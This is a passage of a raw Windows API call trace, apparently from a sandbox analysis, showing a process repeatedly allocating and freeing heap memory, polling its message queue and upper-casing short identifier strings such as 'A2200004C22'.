| out: hHeap=0x25c0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4618 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab220 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab280 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2008 [0157.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab2f8 | out: hHeap=0x25c0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4758 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fd8 [0157.610] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4758 | out: hHeap=0x25c0000) returned 1 [0157.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fd8 | out: hHeap=0x25c0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2f8 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1fd8 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1c0 [0157.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2b0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1fa8 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2068 [0157.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab250 [0157.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1fa8 | out: hHeap=0x25c0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab238 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4758 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0d0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fa8 [0157.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0d0 | out: hHeap=0x25c0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4708 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0d0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aafc8 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0157.611] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0157.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4730 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab160 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1fc8 [0157.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b47d0 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0e8 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2078 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab0e8 | out: hHeap=0x25c0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b47f8 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab0e8 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1d8 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4730 | out: hHeap=0x25c0000) returned 1 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2068 | out: hHeap=0x25c0000) returned 1 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab1f0 | out: hHeap=0x25c0000) returned 1 [0157.612] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4730 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1f0 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2068 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab1a8 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab358 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab130 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2098 [0157.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab148 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2048 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.613] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3d0 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3b8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab388 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3e8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.613] lstrlenW (lpString="20") returned 2 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab400 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab418 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.614] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.614] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3e8 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab400 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab388 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3b8 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab418 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.614] lstrlenW (lpString="30") returned 2 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3d0 | out: hHeap=0x25c0000) returned 1 [0157.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab370 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab148 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2098 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab130 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2048 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab358 | out: hHeap=0x25c0000) returned 1 [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b20a8 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab418 | out: hHeap=0x25c0000) returned 1 [0157.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab3a0 | out: hHeap=0x25c0000) returned 1 [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.615] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.615] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bed70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed70) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0157.616] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0157.616] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0157.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0157.616] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0157.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0157.617] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.617] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.618] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0157.619] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, 